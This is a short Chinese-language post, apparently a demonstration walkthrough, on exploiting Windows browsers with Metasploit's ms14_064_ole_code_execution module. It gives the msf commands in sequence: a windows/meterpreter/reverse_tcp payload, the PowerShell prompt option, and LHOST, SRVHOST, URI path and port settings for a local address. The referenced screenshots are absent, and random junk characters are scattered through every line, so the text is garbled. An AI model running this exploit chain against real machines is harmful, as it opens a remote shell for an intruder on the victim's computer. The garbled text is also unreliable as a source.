! w0 N6 A) V i) h
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示6 S5 R* M; m: @1 r6 |" |0 u: v3 q$ l
0 q Z9 t% x: a% i2 K
+ Q; @- _$ ^" E: d' [, R5 P 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
7 j4 E4 j* W- S- `/ ]( v( S- P
2 ?' W6 F. g; D3 f8 p. \
# D! z8 r" X3 W5 v7 s% \$ j1 {: W
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
6 q' r4 s+ I1 Y" s
2 R! } F6 v, s8 Q
1 u; {8 w, O* o1 {% T* i9 Q, L l/ ` set AllowPowershellPrompt true4 P0 H0 J+ |6 M: J6 b
7 U; g& C$ t8 ?2 X$ v% I2 ]1 j3 Q; P% u1 E1 O x! C! _0 w. i
Set LHOST 192.168.0.109
2 ]7 J" b0 E! p0 @4 K
& e7 G/ T+ S) A0 N# t' M7 t Q5 g! m$ J, k% z. i& \3 }
set SRVHOST 192.168.0.109% `# u- l! G" o4 n6 S2 X4 B
5 t3 t& x# q Q
0 Q% s. i1 l; P" \( S+ m Set uripath share0 j1 v5 k+ Y& z2 J) g& b8 K
5 l9 @6 u. `' g: W; U* |8 A5 i' S7 D. `9 J& o1 ~$ j: q! u+ m4 C
Set srvport 80
. F0 u# }" J h" o
+ s: Y0 c/ N; W& q/ `! ?" q/ s. S9 s m" a0 u) A6 f1 P; B+ d
- Y# n0 j6 @. A* M7 G8 m0 P! D: `
: {3 c7 [, m; u! c6 o: D
0 g9 a7 h! R C' U$ P ( Y) i/ m3 k& u( N* d) Q5 u7 c
* ^' \4 l: U! E/ P& e
1 l, r. Z+ D L/ N+ c . [% ?8 o0 A- u' P8 f
5 w; q2 H& o( D
) h7 E; a7 V7 g; j4 p! K
1 ?" `$ Y9 d! W D5 t9 O! F% D& s
' S" F/ d" D4 _% y
( g: `, u9 k. o4 t) I( S1 o
% G0 x# T Z% B5 u; K: v) S
7 i# d) _( Y2 ]3 P
8 O ^4 u% b: m1 e
下面我们来访问本地地址如图:* v0 v$ B3 [! X, `; a3 i% O
5 H5 ~* | z4 R. }
9 r" M* J* d c, D
) y4 |0 l- R. M# O( J5 _2 k
- k( e! I2 j. F0 E9 k# m% n9 e
" d7 T* N0 @- ?* i- T- Y! w3 v
/ Z k2 T6 L' E% b E4 Q5 S
& R0 f3 @2 Q/ t! o7 l S3 l
) S3 }8 `, ?$ ^8 T2 x